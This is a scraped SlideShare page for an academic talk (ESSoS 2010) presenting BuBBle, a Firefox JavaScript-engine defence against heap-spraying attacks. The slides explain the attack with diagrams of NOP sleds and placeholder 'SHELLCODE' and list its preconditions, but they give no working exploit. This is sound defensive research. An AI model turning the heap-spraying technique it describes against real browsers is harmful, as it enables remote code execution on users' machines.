:	
  a	
  Javascript	
  countermeasure	
  
                  ...
Overview

‣ Heap-­‐spraying	
  attacks

‣ BuBBle	
  approach

‣ Experiments	
  and	
  Results

‣ Conclusion
A	
  new	
  target:	
  
web	
  browsers
A	
  new	
  target:	
  
web	
  browsers
A	
  new	
  target:	
  
web	
  browsers
Firefox	
  vulnerabilities
http://www.mozilla.org/security/known-­‐vulnerabilities/firefox35.html




                     ...
Problem	
  description:	
  
the	
  art	
  of	
  spraying	
  the	
  heap
Problem	
  description:	
  
  the	
  art	
  of	
  spraying	
  the	
  heap
0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0x90 0x9...
Problem	
  description:	
  
the	
  art	
  of	
  spraying	
  the	
  heap
                  sprayed heap                    ...
Heap-­‐spraying	
  attacks
Assumptions
    A	
  buffer	
  overflow/memory	
  corruption	
  
    vulnerability


    Users	
 ...
Heap-­‐spraying	
  attacks
Assumptions
    A	
  buffer	
  overflow/memory	
  corruption	
  
    vulnerability


    Users	
 ...
Heap-­‐spraying	
  attacks
Assumptions
    A	
  buffer	
  overflow/memory	
  corruption	
  
    vulnerability


    Users	
 ...
Heap-­‐spraying	
  attacks
Assumptions
    A	
  buffer	
  overflow/memory	
  corruption	
  
    vulnerability


    Users	
 ...
BuBBle	
  approach:	
  Tracemonkey	
  	
  
             internals


Homogeneity	
  of	
  memory	
  -­‐>	
  monolithical	
 ...
BuBBle	
  approach:
the	
  JSString	
  type	
  (Tracemonkey	
  -­‐	
  Mozilla	
  Firefox	
  3.7)
           Tracemonkey in...
BuBBle	
  approach:
the	
  JSString	
  type	
  (Tracemonkey	
  -­‐	
  Mozilla	
  Firefox	
  3.7)
           Tracemonkey in...
BuBBle	
  approach

•   Introduce	
  diversity	
  in	
  contiguous	
  blocks	
  of	
  
    memory


      •   transform	
 ...
 	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  approach
Hi. I am a dangerous string to jump into a shellcode...
 	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  approach
Hi. I am a dangerous string to jump into a shellcode...
 	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  approach
            Hi. I am a dangerous string to jump into...
 	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  approach
            Hi. I am a dangerous string to jump into...
 	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  approach
             Hi. I am a dangerous string to jump int...
 	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  approach
             Hi. I am a dangerous string to jump int...
BuBBle	
  approach:	
  support	
  data
•	
  Interrupt	
  array	
  of	
  characters
•	
  Change	
  characters	
  at	
  rand...
BuBBle	
  approach:	
  support	
  data
•	
  Interrupt	
  array	
  of	
  characters
•	
  Change	
  characters	
  at	
  rand...
BuBBle	
  approach:	
  js_Transform()
 “blah blah blah is a normal string with appended
                     shellcode”

 ...
BuBBle	
  approach:	
  js_Transform()
 “blah blah blah is a normal string with appended
                     shellcode”

 ...
BuBBle	
  approach:	
  js_Transform()
 “blah blah blah is a normal string with appended
                     shellcode”

 ...
BuBBle	
  approach:	
  js_Transform()
 “blah blah blah is a normal string with appended
                     shellcode”

 ...
BuBBle	
  approach:	
  js_Transform()
 “blah blah blah is a normal string with appended
                     shellcode”

 ...
BuBBle	
  approach:	
  
                               security	
  evaluation

• What?	
  We	
  still	
  spray	
  the	
  h...
Aurora-­‐Google	
  (1-­‐0)
                                                                              var sss =   Array...
BuBBle:	
  performance	
  
   benchmarks
• Macrobenchmarks
• Sunspider	
  Benchmark	
  Suite
• V8	
  
• PeaceKeeper	
  ben...
Benchmark              Perf. Overhead           Site URL                Perf. overhead
Richards                           ...
BuBBle:	
  memory	
  
                   overhead
•  1/24	
  changes

• n-­‐byte	
  original	
  string
• i	
  =	
  n/24
• ...
BuBBle:	
  memory	
  
                    overhead
•   1/24	
  changes

• n-­‐byte	
  original	
  string
• i	
  =	
  n/24 ...
Related	
  work
• ASLR
   Bhatkar, S., Duvarney, D.C., Sekar, R.: Address obfuscation: An efficient approach to combat a br...
Conclusion
•   Lightweight	
  	
  solution(e.g.	
  Mozilla	
  Firefox,	
  Mozilla	
  Fennec)

•   Implemented	
  for	
  Ja...
?
BuBBle: a Javascript engine level countermeasure against heap-spraying attacks
Upcoming SlideShare
Loading in …5
×

BuBBle: a Javascript engine level countermeasure against heap-spraying attacks

1,154 views

Published on

BuBBle: a Javascript engine level countermeasure against heap-spraying attacks
Paper accepted and presented @ ESSoS 2010 Pisa (Italy)
3-4-5 February 2010

Published in: Education
1 Comment
0 Likes
Statistics
Notes
  • Be the first to like this

No Downloads
Views
Total views
1,154
On SlideShare
0
From Embeds
0
Number of Embeds
11
Actions
Shares
0
Downloads
27
Comments
1
Likes
0
Embeds 0
No embeds

No notes for slide

BuBBle: a Javascript engine level countermeasure against heap-spraying attacks

  1. 1.                                :  a  Javascript  countermeasure   against  heap-­‐spraying  attacks Francesco  Gadaleta  -­‐  Yves  Younan  -­‐  Wouter  Joosen Katholieke  Universiteit  Leuven ESSoS  2010 Pisa  3-­‐4  Feb.
  2. 2. Overview ‣ Heap-­‐spraying  attacks ‣ BuBBle  approach ‣ Experiments  and  Results ‣ Conclusion
  3. 3. A  new  target:   web  browsers
  4. 4. A  new  target:   web  browsers
  5. 5. A  new  target:   web  browsers
  6. 6. Firefox  vulnerabilities http://www.mozilla.org/security/known-­‐vulnerabilities/firefox35.html Integer overflow Memory corruption Crash and remote code execution Flash player unloading Heap buffer overflow in string to number conversion
  7. 7. Problem  description:   the  art  of  spraying  the  heap
  8. 8. Problem  description:   the  art  of  spraying  the  heap 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 SHELLCODE
  9. 9. Problem  description:   the  art  of  spraying  the  heap sprayed heap 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 SHELLCODE 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 SHELLCODE 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 SHELLCODE SHELLCODE SHELLCODE 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 SHELLCODE 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 SHELLCODE SHELLCODE 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 SHELLCODE 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 SHELLCODE 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 SHELLCODE 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 SHELLCODE 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 SHELLCODE SHELLCODE SHELLCODE
  10. 10. Heap-­‐spraying  attacks Assumptions A  buffer  overflow/memory  corruption   vulnerability Users  allowed  to  allocate  memory Homogeneity  of  memory
  11. 11. Heap-­‐spraying  attacks Assumptions A  buffer  overflow/memory  corruption   vulnerability Users  allowed  to  allocate  memory Homogeneity  of  memory
  12. 12. Heap-­‐spraying  attacks Assumptions A  buffer  overflow/memory  corruption   vulnerability Users  allowed  to  allocate  memory Homogeneity  of  memory
  13. 13. Heap-­‐spraying  attacks Assumptions A  buffer  overflow/memory  corruption   vulnerability Users  allowed  to  allocate  memory Homogeneity  of  memory
  14. 14. BuBBle  approach:  Tracemonkey     internals Homogeneity  of  memory  -­‐>  monolithical  data  structure • Javascript  Strings
  15. 15. BuBBle  approach: the  JSString  type  (Tracemonkey  -­‐  Mozilla  Firefox  3.7) Tracemonkey internals mLength JSString mChars 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
  16. 16. BuBBle  approach: the  JSString  type  (Tracemonkey  -­‐  Mozilla  Firefox  3.7) Tracemonkey internals mLength JSString mChars 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x9 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x900x90 0x90 0x900x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 SHELLCODE
  17. 17. BuBBle  approach • Introduce  diversity  in  contiguous  blocks  of   memory • transform  Javascript  strings  (internal   structure)
  18. 18.                                approach Hi. I am a dangerous string to jump into a shellcode Transform Hi. I am a dangerous string to jump into a shellcode
  19. 19.                                approach Hi. I am a dangerous string to jump into a shellcode Transform Hi. I am a dangerous string to jump into a shellcode Restore Hi. I am a dangerous string to jump into a shellcode
  20. 20.                                approach Hi. I am a dangerous string to jump into a shellcode <Define  string> Transform Hi. I am a dangerous string to jump into a shellcode Restore Hi. I am a dangerous string to jump into a shellcode
  21. 21.                                approach Hi. I am a dangerous string to jump into a shellcode <Define  string> Transform Hi. I am a dangerous string to jump into a shellcode Restore Hi. I am a dangerous string to jump into a shellcode
  22. 22.                                approach Hi. I am a dangerous string to jump into a shellcode <Define  string> Transform Hi. I am a dangerous string to jump into a shellcode <Use  string> Restore Hi. I am a dangerous string to jump into a shellcode
